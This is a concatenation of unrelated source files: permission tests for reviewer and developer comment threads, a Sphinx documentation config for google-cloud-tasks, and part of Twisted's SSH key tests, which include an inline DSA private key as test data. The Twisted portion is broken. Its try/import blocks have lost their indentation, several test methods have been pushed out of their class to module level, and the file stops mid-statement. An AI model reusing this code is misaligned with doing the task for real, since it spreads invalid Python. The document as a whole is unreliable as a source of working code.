    @mock.patch('mkt.comm.models.acl.check_reviewer')
    def test_rev_can_see_dev(self, check_reviewer_mock):
        """A reviewer can read a developer comment."""
        check_reviewer_mock.return_value = True
        note = self.thread.notes.create(author=self.developer, body='abc',
                                        note_type=const.DEVELOPER_COMMENT)
        ok_(user_has_perm_note(note, self.reviewer, request=True))

    def test_dev_can_see_rev(self):
        """A developer can read a public reviewer comment."""
        note = self.thread.notes.create(
            author=self.reviewer, body='abc',
            note_type=const.REVIEWER_PUBLIC_COMMENT)
        ok_(user_has_perm_note(note, self.developer, request=True))

    def test_dev_can_see_dev(self):
        """A developer can read their own developer comment."""
        note = self.thread.notes.create(
            author=self.developer, body='abc',
            note_type=const.DEVELOPER_COMMENT)
        ok_(user_has_perm_note(note, self.developer, request=True))

    def test_dev_can_see_if_perm(self):
        """An internal note flagged read_permission_developer is visible
        to the developer."""
        note = self.thread.notes.create(
            author=self.developer, body='abc',
            note_type=const.REVIEWER_COMMENT,
            read_permission_developer=True)
        ok_(user_has_perm_note(note, self.developer, request=True))

    def test_dev_cannot_see_internal_rev(self):
        """A developer cannot read an internal reviewer comment."""
        developer2 = user_factory()
        developer2.extension_set.add(self.extension)
        note = self.thread.notes.create(
            author=self.reviewer, body='abc',
            note_type=const.REVIEWER_COMMENT)
        ok_(not user_has_perm_note(note, self.developer, request=True))
class TestUserHasPermNoteApps(TestCase):
    """user_has_perm_note() visibility rules for app (Webapp) threads."""

    def setUp(self):
        super(TestUserHasPermNoteApps, self).setUp()
        self.app = app_factory()
        self.developer = user_factory()
        self.developer.addonuser_set.create(addon=self.app)
        self.reviewer = user_factory()
        # Fix: was grant_permission(self.reviewer, 'Apps', 'Review'), which
        # passes 'Review' as the group *name* and grants the bare rule
        # 'Apps'. The colon-joined form matches the rest of the file
        # (cf. 'Apps:Review' in TestCommunicationThread).
        self.grant_permission(self.reviewer, 'Apps:Review')
        self.thread = CommunicationThread.objects.create(
            _addon=self.app, _version=self.app.latest_version)

    @mock.patch('mkt.comm.models.acl.check_reviewer')
    def test_rev_can_see_dev(self, check_reviewer_mock):
        """A reviewer can read a developer comment."""
        check_reviewer_mock.return_value = True
        note = self.thread.notes.create(author=self.developer, body='abc',
                                        note_type=const.DEVELOPER_COMMENT)
        ok_(user_has_perm_note(note, self.reviewer, request=True))

    def test_dev_can_see_rev(self):
        """A developer can read a public reviewer comment."""
        note = self.thread.notes.create(
            author=self.reviewer, body='abc',
            note_type=const.REVIEWER_PUBLIC_COMMENT)
        ok_(user_has_perm_note(note, self.developer, request=True))

    def test_dev_can_see_dev(self):
        """A co-developer can read another developer's comment."""
        developer2 = user_factory()
        developer2.addonuser_set.create(addon=self.app)
        note = self.thread.notes.create(
            author=self.developer, body='abc',
            note_type=const.DEVELOPER_COMMENT)
        ok_(user_has_perm_note(note, developer2, request=True))

    def test_dev_can_see_if_perm(self):
        """An internal note flagged read_permission_developer is visible
        to the developer."""
        note = self.thread.notes.create(
            author=self.developer, body='abc',
            note_type=const.REVIEWER_COMMENT,
            read_permission_developer=True)
        ok_(user_has_perm_note(note, self.developer, request=True))

    def test_dev_cannot_see_internal_rev(self):
        """A developer cannot read an internal reviewer comment."""
        note = self.thread.notes.create(
            author=self.reviewer, body='abc',
            note_type=const.REVIEWER_COMMENT)
        ok_(not user_has_perm_note(note, self.developer, request=True))
| bsd-3-clause |
googleapis/googleapis-gen | google/cloud/tasks/v2beta2/tasks-v2beta2-py/docs/conf.py | 3 | 12447 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# google-cloud-tasks documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex  # NOTE(review): appears unused — kept as this file is autogenerated

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))

__version__ = "0.1.0"

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.6.3"

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    "sphinx.ext.autodoc",
    "sphinx.ext.autosummary",
    "sphinx.ext.intersphinx",
    "sphinx.ext.coverage",
    "sphinx.ext.napoleon",
    "sphinx.ext.todo",
    "sphinx.ext.viewcode",
]

# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_flags = ["members"]
autosummary_generate = True

# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]

# Allow markdown includes (so releases.md can include CHANGELOG.md)
# http://www.sphinx-doc.org/en/master/markdown.html
source_parsers = {".md": "recommonmark.parser.CommonMarkParser"}

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
source_suffix = [".rst", ".md"]

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = "index"

# General information about the project.
project = u"google-cloud-tasks"
copyright = u"2020, Google, LLC"
author = u"Google APIs"  # TODO: autogenerate this bit

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]

# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"

# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True

# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
    "description": "Google Cloud Client Libraries for Python",
    "github_user": "googleapis",
    "github_repo": "google-cloud-python",
    "github_banner": True,
    "font_family": "'Roboto', Georgia, sans",
    "head_font_family": "'Roboto', Georgia, serif",
    "code_font_family": "'Roboto Mono', 'Consolas', monospace",
}

# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}

# If false, no module index is generated.
# html_domain_indices = True

# If false, no index is generated.
# html_use_index = True

# If true, the index is split into individual pages for each letter.
# html_split_index = False

# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None

# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'

# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}

# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'

# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-tasks-doc"

# -- Options for warnings ------------------------------------------------------

suppress_warnings = [
    # Temporarily suppress this to avoid "more than one target found for
    # cross-reference" warning, which are intractable for us to avoid while in
    # a mono-repo.
    # See https://github.com/sphinx-doc/sphinx/blob
    # /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
    "ref.python"
]

# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    # 'preamble': '',
    # Latex figure (float) alignment
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (
        master_doc,
        "google-cloud-tasks.tex",
        u"google-cloud-tasks Documentation",
        author,
        "manual",
    )
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False

# If true, show page references after internal links.
# latex_show_pagerefs = False

# If true, show URL addresses after external links.
# latex_show_urls = False

# Documents to append as an appendix to all manuals.
# latex_appendices = []

# If false, no module index is generated.
# latex_domain_indices = True

# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (
        master_doc,
        "google-cloud-tasks",
        u"Google Cloud Tasks Documentation",
        [author],
        1,
    )
]

# If true, show URL addresses after external links.
# man_show_urls = False

# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (
        master_doc,
        "google-cloud-tasks",
        u"google-cloud-tasks Documentation",
        author,
        "google-cloud-tasks",
        "GAPIC library for Google Cloud Tasks API",
        "APIs",
    )
]

# Documents to append as an appendix to all manuals.
# texinfo_appendices = []

# If false, no module index is generated.
# texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False

# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
    "python": ("http://python.readthedocs.org/en/latest/", None),
    "gax": ("https://gax-python.readthedocs.org/en/latest/", None),
    "google-auth": ("https://google-auth.readthedocs.io/en/stable", None),
    "google-gax": ("https://gax-python.readthedocs.io/en/latest/", None),
    "google.api_core": ("https://googleapis.dev/python/google-api-core/latest/", None),
    "grpc": ("https://grpc.io/grpc/python/", None),
    "requests": ("http://requests.kennethreitz.org/en/stable/", None),
    "proto": ("https://proto-plus-python.readthedocs.io/en/stable", None),
    "protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}

# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
heeraj123/oh-mainline | vendor/packages/twisted/twisted/conch/test/test_keys.py | 17 | 19424 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.ssh.keys}.
"""
try:
import Crypto.Cipher.DES3
except ImportError:
# we'll have to skip these tests without PyCypto and pyasn1
Crypto = None
try:
import pyasn1
except ImportError:
pyasn1 = None
if Crypto and pyasn1:
from twisted.conch.ssh import keys, common, sexpy
import os, base64
from twisted.conch.test import keydata
from twisted.python import randbytes
from twisted.python.hashlib import sha1
from twisted.trial import unittest
class HelpersTestCase(unittest.TestCase):
    """
    Tests for the module-level helper functions in
    L{twisted.conch.ssh.keys}.
    """
    if Crypto is None:
        skip = "cannot run w/o PyCrypto"
    if pyasn1 is None:
        # Fix: skip message had a stray trailing slash ("w/o/ PyASN1").
        skip = "cannot run w/o PyASN1"

    def setUp(self):
        # Make secureRandom deterministic so signatures are reproducible.
        self._secureRandom = randbytes.secureRandom
        randbytes.secureRandom = lambda x: '\x55' * x

    def tearDown(self):
        # Restore the real RNG.
        randbytes.secureRandom = self._secureRandom
        self._secureRandom = None

    def test_pkcs1(self):
        """
        Test Public Key Cryptographic Standard #1 functions.
        """
        data = 'ABC'
        messageSize = 6
        self.assertEquals(keys.pkcs1Pad(data, messageSize),
                          '\x01\xff\x00ABC')
        # Renamed from 'hash' to avoid shadowing the builtin.
        emptyHash = sha1().digest()
        messageSize = 40
        self.assertEquals(keys.pkcs1Digest('', messageSize),
                          '\x01\xff\xff\xff\x00' + keys.ID_SHA1 + emptyHash)

    def _signRSA(self, data):
        """Sign C{data} with the test RSA key; return (keyObject, sig)."""
        key = keys.Key.fromString(keydata.privateRSA_openssh)
        sig = key.sign(data)
        return key.keyObject, sig

    def _signDSA(self, data):
        """Sign C{data} with the test DSA key; return (keyObject, sig)."""
        key = keys.Key.fromString(keydata.privateDSA_openssh)
        sig = key.sign(data)
        return key.keyObject, sig

    def test_signRSA(self):
        """
        Test that RSA keys return appropriate signatures.
        """
        data = 'data'
        key, sig = self._signRSA(data)
        sigData = keys.pkcs1Digest(data, keys.lenSig(key))
        v = key.sign(sigData, '')[0]
        self.assertEquals(sig, common.NS('ssh-rsa') + common.MP(v))
        return key, sig

    def test_signDSA(self):
        """
        Test that DSA keys return appropriate signatures.
        """
        data = 'data'
        key, sig = self._signDSA(data)
        sigData = sha1(data).digest()
        # '\x55' * 19 matches the stubbed secureRandom from setUp.
        v = key.sign(sigData, '\x55' * 19)
        self.assertEquals(sig, common.NS('ssh-dss') + common.NS(
            Crypto.Util.number.long_to_bytes(v[0], 20) +
            Crypto.Util.number.long_to_bytes(v[1], 20)))
        return key, sig

    def test_objectType(self):
        """
        Test that objectType returns the correct type for objects.
        """
        self.assertEquals(keys.objectType(keys.Key.fromString(
            keydata.privateRSA_openssh).keyObject), 'ssh-rsa')
        self.assertEquals(keys.objectType(keys.Key.fromString(
            keydata.privateDSA_openssh).keyObject), 'ssh-dss')
        self.assertRaises(keys.BadKeyError, keys.objectType, None)
class KeyTestCase(unittest.TestCase):
    """
    Tests for L{keys.Key}.
    """
    if Crypto is None:
        skip = "cannot run w/o PyCrypto"
    if pyasn1 is None:
        # Fix: skip message had a stray trailing slash ("w/o/ PyASN1").
        skip = "cannot run w/o PyASN1"
    def setUp(self):
        # Tiny key objects built from small integers: structurally valid
        # for PyCrypto's construct() but cryptographically meaningless.
        self.rsaObj = Crypto.PublicKey.RSA.construct((1L, 2L, 3L, 4L, 5L))
        self.dsaObj = Crypto.PublicKey.DSA.construct((1L, 2L, 3L, 4L, 5L))
        # Canned wire-format signatures used by the signature tests.
        self.rsaSignature = ('\x00\x00\x00\x07ssh-rsa\x00'
            '\x00\x00`N\xac\xb4@qK\xa0(\xc3\xf2h \xd3\xdd\xee6Np\x9d_'
            '\xb0>\xe3\x0c(L\x9d{\txUd|!\xf6m\x9c\xd3\x93\x842\x7fU'
            '\x05\xf4\xf7\xfaD\xda\xce\x81\x8ea\x7f=Y\xed*\xb7\xba\x81'
            '\xf2\xad\xda\xeb(\x97\x03S\x08\x81\xc7\xb1\xb7\xe6\xe3'
            '\xcd*\xd4\xbd\xc0wt\xf7y\xcd\xf0\xb7\x7f\xfb\x1e>\xf9r'
            '\x8c\xba')
        self.dsaSignature = ('\x00\x00\x00\x07ssh-dss\x00\x00'
            '\x00(\x18z)H\x8a\x1b\xc6\r\xbbq\xa2\xd7f\x7f$\xa7\xbf'
            '\xe8\x87\x8c\x88\xef\xd9k\x1a\x98\xdd{=\xdec\x18\t\xe3'
            '\x87\xa9\xc72h\x95')
        # Make secureRandom deterministic for reproducible signatures.
        self.oldSecureRandom = randbytes.secureRandom
        randbytes.secureRandom = lambda x: '\xff' * x
        # On-disk key used by the fromFile tests.
        self.keyFile = self.mktemp()
        file(self.keyFile, 'wb').write(keydata.privateRSA_lsh)
    def tearDown(self):
        # Restore the real RNG and remove the temporary key file.
        randbytes.secureRandom = self.oldSecureRandom
        del self.oldSecureRandom
        os.unlink(self.keyFile)
    def test__guessStringType(self):
        """
        Test that the _guessStringType method guesses string types
        correctly: OpenSSH/LSH public and private formats, agent v3,
        raw blobs, and None for unrecognised data.
        """
        self.assertEquals(keys.Key._guessStringType(keydata.publicRSA_openssh),
                          'public_openssh')
        self.assertEquals(keys.Key._guessStringType(keydata.publicDSA_openssh),
                          'public_openssh')
        self.assertEquals(keys.Key._guessStringType(
            keydata.privateRSA_openssh), 'private_openssh')
        self.assertEquals(keys.Key._guessStringType(
            keydata.privateDSA_openssh), 'private_openssh')
        self.assertEquals(keys.Key._guessStringType(keydata.publicRSA_lsh),
                          'public_lsh')
        self.assertEquals(keys.Key._guessStringType(keydata.publicDSA_lsh),
                          'public_lsh')
        self.assertEquals(keys.Key._guessStringType(keydata.privateRSA_lsh),
                          'private_lsh')
        self.assertEquals(keys.Key._guessStringType(keydata.privateDSA_lsh),
                          'private_lsh')
        self.assertEquals(keys.Key._guessStringType(
            keydata.privateRSA_agentv3), 'agentv3')
        self.assertEquals(keys.Key._guessStringType(
            keydata.privateDSA_agentv3), 'agentv3')
        self.assertEquals(keys.Key._guessStringType(
            '\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x01'),
            'blob')
        self.assertEquals(keys.Key._guessStringType(
            '\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x01'),
            'blob')
        self.assertEquals(keys.Key._guessStringType('not a key'),
                          None)
    def _testPublicPrivateFromString(self, public, private, type, data):
        """Check both serialized forms of one key pair against the
        expected key type and component data."""
        self._testPublicFromString(public, type, data)
        self._testPrivateFromString(private, type, data)
    def _testPublicFromString(self, public, type, data):
        """Parse a serialized public key and verify its type and that
        every component it exposes matches C{data}."""
        publicKey = keys.Key.fromString(public)
        self.assertTrue(publicKey.isPublic())
        self.assertEquals(publicKey.type(), type)
        for k, v in publicKey.data().items():
            self.assertEquals(data[k], v)
    def _testPrivateFromString(self, private, type, data):
        """Parse a serialized private key and verify its type and that
        it contains every component in C{data}."""
        privateKey = keys.Key.fromString(private)
        self.assertFalse(privateKey.isPublic())
        self.assertEquals(privateKey.type(), type)
        for k, v in data.items():
            self.assertEquals(privateKey.data()[k], v)
    def test_fromOpenSSH(self):
        """
        Test that keys are correctly generated from OpenSSH strings,
        including an encrypted key and an alternate encoding.
        """
        self._testPublicPrivateFromString(keydata.publicRSA_openssh,
                keydata.privateRSA_openssh, 'RSA', keydata.RSAData)
        self.assertEquals(keys.Key.fromString(
            keydata.privateRSA_openssh_encrypted,
            passphrase='encrypted'),
            keys.Key.fromString(keydata.privateRSA_openssh))
        self.assertEquals(keys.Key.fromString(
            keydata.privateRSA_openssh_alternate),
            keys.Key.fromString(keydata.privateRSA_openssh))
        self._testPublicPrivateFromString(keydata.publicDSA_openssh,
                keydata.privateDSA_openssh, 'DSA', keydata.DSAData)
    def test_fromOpenSSH_with_whitespace(self):
        """
        If key strings have trailing whitespace, it should be ignored.
        """
        # from bug #3391, since our test key data doesn't have
        # an issue with appended newlines
        privateDSAData = """-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQDylESNuc61jq2yatCzZbenlr9llG+p9LhIpOLUbXhhHcwC6hrh
EZIdCKqTO0USLrGoP5uS9UHAUoeN62Z0KXXWTwOWGEQn/syyPzNJtnBorHpNUT9D
Qzwl1yUa53NNgEctpo4NoEFOx8PuU6iFLyvgHCjNn2MsuGuzkZm7sI9ZpQIVAJiR
9dPc08KLdpJyRxz8T74b4FQRAoGAGBc4Z5Y6R/HZi7AYM/iNOM8su6hrk8ypkBwR
a3Dbhzk97fuV3SF1SDrcQu4zF7c4CtH609N5nfZs2SUjLLGPWln83Ysb8qhh55Em
AcHXuROrHS/sDsnqu8FQp86MaudrqMExCOYyVPE7jaBWW+/JWFbKCxmgOCSdViUJ
esJpBFsCgYEA7+jtVvSt9yrwsS/YU1QGP5wRAiDYB+T5cK4HytzAqJKRdC5qS4zf
C7R0eKcDHHLMYO39aPnCwXjscisnInEhYGNblTDyPyiyNxAOXuC8x7luTmwzMbNJ
/ow0IqSj0VF72VJN9uSoPpFd4lLT0zN8v42RWja0M8ohWNf+YNJluPgCFE0PT4Vm
SUrCyZXsNh6VXwjs3gKQ
-----END DSA PRIVATE KEY-----"""
        self.assertEquals(keys.Key.fromString(privateDSAData),
                          keys.Key.fromString(privateDSAData + '\n'))
    def test_fromLSH(self):
        """
        Test that keys are correctly generated from LSH strings, and that
        a bad key type inside the s-expression raises BadKeyError.
        """
        self._testPublicPrivateFromString(keydata.publicRSA_lsh,
                keydata.privateRSA_lsh, 'RSA', keydata.RSAData)
        self._testPublicPrivateFromString(keydata.publicDSA_lsh,
                keydata.privateDSA_lsh, 'DSA', keydata.DSAData)
        sexp = sexpy.pack([['public-key', ['bad-key', ['p', '2']]]])
        self.assertRaises(keys.BadKeyError, keys.Key.fromString,
                          data='{'+base64.encodestring(sexp)+'}')
        sexp = sexpy.pack([['private-key', ['bad-key', ['p', '2']]]])
        self.assertRaises(keys.BadKeyError, keys.Key.fromString,
                          sexp)
    def test_fromAgentv3(self):
        """
        Test that keys are correctly generated from Agent v3 strings, and
        that an unknown key type raises BadKeyError.
        """
        self._testPrivateFromString(keydata.privateRSA_agentv3, 'RSA',
                keydata.RSAData)
        self._testPrivateFromString(keydata.privateDSA_agentv3, 'DSA',
                keydata.DSAData)
        self.assertRaises(keys.BadKeyError, keys.Key.fromString,
                          '\x00\x00\x00\x07ssh-foo'+'\x00\x00\x00\x01\x01'*5)
    def test_fromStringErrors(self):
        """
        keys.Key.fromString should raise BadKeyError when the key is invalid.
        """
        self.assertRaises(keys.BadKeyError, keys.Key.fromString, '')
        # no key data with a bad key type
        self.assertRaises(keys.BadKeyError, keys.Key.fromString, '',
                          'bad_type')
        # trying to decrypt a key which doesn't support encryption
        self.assertRaises(keys.BadKeyError, keys.Key.fromString,
                          keydata.publicRSA_lsh, passphrase = 'unencrypted')
        # an encrypted key with no passphrase supplied
        self.assertRaises(keys.EncryptedKeyError, keys.Key.fromString,
                          keys.Key(self.rsaObj).toString('openssh', 'encrypted'))
        # key with no key data
        self.assertRaises(keys.BadKeyError, keys.Key.fromString,
                          '-----BEGIN RSA KEY-----\nwA==\n')
    def test_fromFile(self):
        """
        Test that fromFile works correctly: reads the key written by
        setUp, and propagates type/passphrase errors.
        """
        self.assertEquals(keys.Key.fromFile(self.keyFile),
                          keys.Key.fromString(keydata.privateRSA_lsh))
        self.assertRaises(keys.BadKeyError, keys.Key.fromFile,
                          self.keyFile, 'bad_type')
        self.assertRaises(keys.BadKeyError, keys.Key.fromFile,
                          self.keyFile, passphrase='unencrypted')
    def test_init(self):
        """
        Test that the Key object stores the wrapped key object verbatim.
        """
        obj = Crypto.PublicKey.RSA.construct((1L, 2L))
        key = keys.Key(obj)
        self.assertEquals(key.keyObject, obj)
    def test_equal(self):
        """
        Test that Key objects are compared correctly: equal for the same
        underlying key, unequal across keys, types, and non-Key values.
        """
        rsa1 = keys.Key(self.rsaObj)
        rsa2 = keys.Key(self.rsaObj)
        rsa3 = keys.Key(Crypto.PublicKey.RSA.construct((1L, 2L)))
        dsa = keys.Key(self.dsaObj)
        self.assertTrue(rsa1 == rsa2)
        self.assertFalse(rsa1 == rsa3)
        self.assertFalse(rsa1 == dsa)
        self.assertFalse(rsa1 == object)
        self.assertFalse(rsa1 == None)
    def test_notEqual(self):
        """
        Test that != is the exact inverse of == for Key objects.
        """
        rsa1 = keys.Key(self.rsaObj)
        rsa2 = keys.Key(self.rsaObj)
        rsa3 = keys.Key(Crypto.PublicKey.RSA.construct((1L, 2L)))
        dsa = keys.Key(self.dsaObj)
        self.assertFalse(rsa1 != rsa2)
        self.assertTrue(rsa1 != rsa3)
        self.assertTrue(rsa1 != dsa)
        self.assertTrue(rsa1 != object)
        self.assertTrue(rsa1 != None)
    def test_type(self):
        """
        Test that type()/sshType() return the correct names and raise
        RuntimeError for unrecognized wrapped objects.
        """
        self.assertEquals(keys.Key(self.rsaObj).type(), 'RSA')
        self.assertEquals(keys.Key(self.rsaObj).sshType(), 'ssh-rsa')
        self.assertEquals(keys.Key(self.dsaObj).type(), 'DSA')
        self.assertEquals(keys.Key(self.dsaObj).sshType(), 'ssh-dss')
        self.assertRaises(RuntimeError, keys.Key(None).type)
        self.assertRaises(RuntimeError, keys.Key(None).sshType)
        self.assertRaises(RuntimeError, keys.Key(self).type)
        self.assertRaises(RuntimeError, keys.Key(self).sshType)
    def test_fromBlob(self):
        """
        Test that a public key is correctly generated from a public key blob.
        """
        rsaBlob = common.NS('ssh-rsa') + common.MP(2) + common.MP(3)
        rsaKey = keys.Key.fromString(rsaBlob)
        dsaBlob = (common.NS('ssh-dss') + common.MP(2) + common.MP(3) +
                   common.MP(4) + common.MP(5))
        dsaKey = keys.Key.fromString(dsaBlob)
        badBlob = common.NS('ssh-bad')
        self.assertTrue(rsaKey.isPublic())
        self.assertEquals(rsaKey.data(), {'e':2L, 'n':3L})
        self.assertTrue(dsaKey.isPublic())
        self.assertEquals(dsaKey.data(), {'p':2L, 'q':3L, 'g':4L, 'y':5L})
        self.assertRaises(keys.BadKeyError,
                          keys.Key.fromString, badBlob)
    def test_fromPrivateBlob(self):
        """
        Test that a private key is correctly generated from a private key blob.
        """
        rsaBlob = (common.NS('ssh-rsa') + common.MP(2) + common.MP(3) +
                   common.MP(4) + common.MP(5) + common.MP(6) + common.MP(7))
        rsaKey = keys.Key._fromString_PRIVATE_BLOB(rsaBlob)
        dsaBlob = (common.NS('ssh-dss') + common.MP(2) + common.MP(3) +
                   common.MP(4) + common.MP(5) + common.MP(6))
        dsaKey = keys.Key._fromString_PRIVATE_BLOB(dsaBlob)
        badBlob = common.NS('ssh-bad')
        self.assertFalse(rsaKey.isPublic())
        self.assertEqual(
            rsaKey.data(), {'n':2L, 'e':3L, 'd':4L, 'u':5L, 'p':6L, 'q':7L})
        self.assertFalse(dsaKey.isPublic())
        self.assertEqual(dsaKey.data(), {'p':2L, 'q':3L, 'g':4L, 'y':5L, 'x':6L})
        self.assertRaises(
            keys.BadKeyError, keys.Key._fromString_PRIVATE_BLOB, badBlob)
def test_blob(self):
    """
    Test that the Key object generates blobs correctly.
    """
    # assertEqual: non-deprecated spelling of assertEquals.
    self.assertEqual(keys.Key(self.rsaObj).blob(),
                     '\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x02'
                     '\x00\x00\x00\x01\x01')
    self.assertEqual(keys.Key(self.dsaObj).blob(),
                     '\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x03'
                     '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x02'
                     '\x00\x00\x00\x01\x01')
    # A Key with no underlying key object cannot produce a blob.
    badKey = keys.Key(None)
    self.assertRaises(RuntimeError, badKey.blob)
def test_privateBlob(self):
    """
    L{Key.privateBlob} returns the SSH protocol-level format of the private
    key and raises L{RuntimeError} if the underlying key object is invalid.
    """
    # assertEqual: non-deprecated spelling of assertEquals.
    self.assertEqual(keys.Key(self.rsaObj).privateBlob(),
                     '\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x01'
                     '\x00\x00\x00\x01\x02\x00\x00\x00\x01\x03\x00'
                     '\x00\x00\x01\x04\x00\x00\x00\x01\x04\x00\x00'
                     '\x00\x01\x05')
    self.assertEqual(keys.Key(self.dsaObj).privateBlob(),
                     '\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x03'
                     '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x02\x00'
                     '\x00\x00\x01\x01\x00\x00\x00\x01\x05')
    # A Key with no underlying key object cannot produce a private blob.
    badKey = keys.Key(None)
    self.assertRaises(RuntimeError, badKey.privateBlob)
def test_toOpenSSH(self):
    """
    Test that the Key object generates OpenSSH keys correctly.
    """
    # assertEqual throughout: non-deprecated spelling of assertEquals.
    key = keys.Key.fromString(keydata.privateRSA_lsh)
    self.assertEqual(key.toString('openssh'), keydata.privateRSA_openssh)
    self.assertEqual(key.toString('openssh', 'encrypted'),
